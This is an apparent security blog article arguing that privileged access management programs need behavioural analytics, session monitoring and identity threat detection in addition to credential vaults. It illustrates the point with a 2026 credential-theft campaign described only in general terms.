Most PAM conversations start and end with the vault. But a vault is a storage and access control system — not a detection system. The half of the program most organizations are missing is the part that tells you when something is going wrong.
Most PAM conversations start and end with the vault. Get credentials out of spreadsheets and into a managed system. Rotate passwords. Enforce MFA on privileged accounts. Control who can check out what. That is the foundation and it is the right place to start.
But a vault is a storage and access control system. It is not a detection system. And in 2026, the organizations that treat their PAM deployment as complete once the vault is running are missing the half of the program that actually tells you when something is going wrong.
Why It Matters
Consider what happened in May 2026 with the FortiClient EMS campaign. Threat actors exploited a critical pre-authentication vulnerability to achieve privilege escalation, then disguised a credential-stealing payload as a legitimate endpoint update and delivered it silently through PowerShell across managed endpoints. The entry point was a trusted management system. The delivery mechanism looked like normal administrative activity. The credentials harvested were real, valid, and indistinguishable from authorized use once in an attacker's hands.
A vault stores those credentials securely. A vault does not tell you that the account checking them out at 2am is doing something it has never done before. A vault does not flag that a privileged session that normally touches three servers suddenly accessed forty. A vault does not surface the pattern that connects a credential checkout to a lateral movement event forty minutes later.
That is what analytics does. And without it, your PAM program has a significant blind spot at exactly the moment it matters most — after a credential has been compromised and the attacker is using it.
The PAM Lesson
PAM analytics is not a separate product bolted onto a vault. It is the visibility layer that makes the entire PAM investment meaningful as a security control rather than just a compliance checkbox.
The starting point is behavioral baselining. Every privileged account has a normal pattern — what systems it accesses, what times it operates, what commands it runs, what volumes of data it touches. Establishing that baseline is what makes anomalies visible. Without it, you are watching a stream of privileged activity with no frame of reference for what normal looks like.
Anomaly detection builds on that baseline. An account that has never authenticated from a European IP address doing so at 3am is an anomaly. A service account that runs the same three queries every night suddenly executing a bulk export is an anomaly. A privileged user checking out credentials for a system they have never touched is an anomaly. None of these are automatically malicious. All of them are worth a second look. The value of anomaly detection is not generating alerts — it is generating the right alerts at the right time with enough context to act on.
Session analytics closes the loop on what privileged accounts actually do during the sessions they open. Keystroke logging, command analysis, and screen recording are not just audit trail features — they are the raw material for detection. A session that starts with normal administrative commands and then runs a discovery scan followed by a PowerShell download is a story you can read in real time if the analytics layer is watching it. Without session analytics, that story only becomes visible in a post-breach forensics exercise, which is the worst possible time to read it.
Identity Threat Detection and Response — ITDR — represents the maturation of these capabilities into a coordinated detection and response function. ITDR connects the identity layer to the SOC. It correlates privileged access events with threat intelligence, endpoint telemetry, and network activity to surface identity-based attacks as they are happening rather than after the fact. The identity team has always had the data to contribute to detection. ITDR is the operational framework that makes that contribution systematic.
The Visibility Gap
Here is the honest assessment of where most organizations actually are: they have a vault, they have session recording turned on, and nobody is watching the recordings unless something goes wrong.
Session recordings that are never reviewed until after a breach are a forensics capability, not a detection capability. The difference is not the data — it is the analytics layer that processes that data continuously and surfaces the events worth human attention before the breach becomes obvious.
This is the gap between PAM as a compliance control and PAM as a security control. Compliance requires that you have the audit trail. Security requires that someone — or something — is actually analyzing it.
The organizations that have closed this gap share a few common characteristics. They have defined what normal privileged activity looks like in their environment and documented it. They have configured alerting on deviations from that baseline rather than waiting for manual review. They have connected their PAM platform's analytics output to their SIEM or SOAR so privileged access events are part of the same detection workflow as everything else. And they treat privileged account anomalies with the same urgency as endpoint alerts — because in most breach scenarios, they are the same event observed from a different angle.
What to Check This Week
The vault is the foundation. Analytics is what makes it a security program. You cannot defend what you cannot see, and right now most organizations can see the credential sitting in the vault far more clearly than they can see what happens after it leaves.